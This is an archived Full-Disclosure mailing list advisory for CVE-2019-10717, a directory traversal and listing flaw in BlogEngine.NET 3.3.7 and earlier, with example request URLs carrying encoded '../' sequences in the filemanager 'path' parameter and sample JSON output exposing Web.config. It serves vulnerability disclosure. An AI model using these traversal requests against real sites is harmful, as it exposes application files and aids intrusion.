lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 24 Jun 2019 17:42:26 -0600 From: aaron bishop <abishop@...ux.com> To: fulldisclosure@...lists.org Subject: [FD] BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing *CVE-2019-10717* - A Directory Traversal + Directory Listing exists on BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the /api/filemanager endpoint. A request such as: https://$HOST/api/filemanager?path=*%2F..%2f..%2f* Discloses the contents of the application root: .... { "IsChecked": false, "SortOrder": 25, "Created": "5/26/2018 1:53:02 PM", "Name": "Web.config", "FileSize": "19.41 kb", "FileType": 1, "FullPath": "/../../Web.config", "ImgPlaceholder": "fa fa-file-o" }, .... The contents of additional directories can be viewed by modifying the path: https://$HOST/api/filemanager?path=*%2F..%2f..%2fContent* ... { "IsChecked": false, "SortOrder": 15, "Created": "3/30/2019 9:09:23 PM", "Name": "toastr.scss", "FileSize": "6.92 kb", "FileType": 1, "FullPath": "/../../Content/toastr.scss", "ImgPlaceholder": "fa fa-file-o" } ... Disclosure: https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists